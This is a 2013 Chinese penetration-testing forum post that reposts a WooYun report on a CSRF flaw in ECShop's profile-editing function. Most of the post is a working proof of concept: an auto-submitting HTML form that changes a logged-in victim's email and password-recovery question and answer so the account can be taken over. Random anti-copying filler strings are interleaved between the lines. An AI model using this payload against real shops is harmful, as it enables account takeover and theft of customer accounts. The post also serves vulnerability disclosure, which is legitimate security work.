中国网络渗透测试联盟
标题:
ecshop修改任意用户密码漏洞的CSRF利用
[打印本页]
作者:
admin
时间:
2013-2-20 08:30
标题:
ecshop修改任意用户密码漏洞的CSRF利用
简要描述:
6 P8 p o, @ G1 F
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
+ N) J( B2 j3 h7 L
$ H3 r( I- Z% I
Demo For:
http://www.wooyun.org/bug.php?action=view&id=395
2 a7 P& T9 {6 a) b- x& v
" p) a' F& ~3 B2 Z- R
详细说明:
$ a( V- A A: y
利用csrf和xss可以突破官方所说的“障碍”
/ L1 ~6 h4 i" L9 N* [2 \
xss版本已经有人说明
& R, K! ]' y& _2 r
这里给出csrf版本
e! H# j8 _- O4 z& t
. ]3 V, g0 a k0 T- K* o
漏洞证明:
0 s2 a% a' Y+ ]( w' O
<html>
) R/ o0 j$ i1 b. d$ i: s& I
<body>
# m8 r8 m3 j" N, H, R1 L( T
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
4 f6 c( K4 v3 B: A0 \5 R: ?- E
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
+ c# V& O, y5 @5 W* N( F
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
* e' ~! f# p4 w/ ^1 o, B, Z
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
5 R/ P) e3 k* k: b7 S
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
( R% R# \3 _# S; T p/ x7 M& _
</body>
6 H( C( p5 g* T$ ]
<script>
! C* s+ C& s9 W X
document.forms[0].submit();
. {, [' @: g" P- K
</script>
, u4 _7 v. }, T) |
</html>
0 j- L; F0 w. b/ L$ r/ y# \
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
) g; |7 c; |' t/ g7 y
& i+ q! e, D% t2 u! I* f: n; v0 [$ R' i
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2